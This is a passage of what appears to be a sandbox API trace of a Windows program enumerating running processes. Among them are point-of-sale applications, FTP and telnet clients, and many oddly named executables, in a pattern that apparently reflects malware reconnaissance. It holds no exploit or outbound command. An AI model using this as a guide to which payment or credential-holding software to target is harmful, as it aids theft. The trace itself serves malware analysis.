lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0245.430] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0245.435] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0245.437] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0245.440] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0245.443] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0245.445] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0245.448] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0245.451] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0245.453] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0245.456] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0245.459] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0245.500] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0245.503] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0245.506] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0245.510] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0245.514] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0245.517] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0245.519] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0245.522] Process32Next (in: hSnapshot=0x230c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0245.524] CloseHandle (hObject=0x230c) returned 1 [0245.525] Sleep (dwMilliseconds=0x64) [0245.645] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2234 [0245.658] Process32First (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.660] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0245.662] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0245.663] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.665] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0245.667] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.671] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0245.673] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0245.676] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0245.678] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.681] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.688] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0245.691] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.692] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.694] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.696] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.698] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.700] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.702] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.704] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0245.706] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0245.707] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.709] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0245.710] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.712] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0245.715] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0245.717] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0245.719] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0245.720] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0245.722] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0245.726] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.729] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0245.730] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0245.732] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0245.734] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.736] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0245.738] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0245.739] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0245.741] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0245.743] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0245.745] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0245.747] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0245.749] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0245.750] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0245.752] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0245.754] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0245.755] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0245.757] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0245.759] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0245.761] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0245.765] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0245.767] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0245.769] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0245.804] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0245.806] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0245.808] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0245.810] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0245.812] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0245.814] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0245.816] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0245.819] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0245.822] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0245.824] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0245.826] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0245.829] Process32Next (in: hSnapshot=0x2234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, 